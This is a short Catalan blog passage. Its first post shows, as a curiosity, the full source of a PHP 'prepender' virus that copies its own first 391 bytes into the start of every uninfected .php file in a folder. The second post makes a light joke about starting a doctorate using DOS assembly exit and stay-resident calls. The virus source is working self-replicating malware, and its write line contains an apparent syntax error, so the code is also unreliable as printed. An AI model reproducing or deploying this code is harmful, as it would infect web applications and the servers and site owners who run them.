dijous, 22 d’octubre de 2015

Virus en PHP

Acabe de trobar un exemple simple de virus en PHP, m'he quedat flipat de la sensillesa, és clavat als virus.bat de MS-DOS:
1. Busca tots els .php de la carpeta
2. Si no està infectat:
  2.1 Escriu el contingut de la part del virus (anomenada prepender, 391 bytes) a l'inicio de l'arxiu
  2.2 busca el següent arxiu i ves al punt dos


Pareix simple i el codi la veritat és que ho demostra:

 - - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -
<?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.'); 
while ($file = readdir($curdir)) 
{ 
 if (strstr($file, '.php'))
 {
  $victim=fopen($file, 'r+');
  if (!strstr(fread($victim, 13), 'SPTH'))
  {
   rewind($victim);
   fwrite($victim, $string.fread($victim, filesize($file)););
  }
  fclose($victim);
 } 
}
closedir($curdir);
?>
 
 

dimarts, 20 d’octubre de 2015

Comence el doctorat

Doncs ara comence el doctorat, i tinc poc de temps, possiblement les meues proves aniré publicant-les però, mai se sap, recordant  vells temps, tinc dos possibilitats i no sé que faré:

 a)
mov ah,4ch
int 21h

b)
int 27h